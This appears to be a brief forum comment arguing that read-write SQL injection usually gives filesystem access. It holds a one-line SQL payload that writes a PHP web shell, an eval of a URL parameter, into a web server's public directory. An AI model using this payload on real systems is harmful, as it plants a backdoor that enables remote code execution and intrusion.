3 ms·
> I don't get this part. Read-write SQL injection does not imply that the attacker has access to the filesystem. Theoretically no, but in practice, all you rea
by CiPHPerCoder 10y ago
> I don't get this part. Read-write SQL injection does not imply that the attacker has access to the filesystem.
Theoretically no, but in practice, all you really need is
SELECT '<?php eval($_GET["foo"]); ' INTO OUTFILE '/var/www/example.com/public_html/backdoor.php';
to get access to most servers.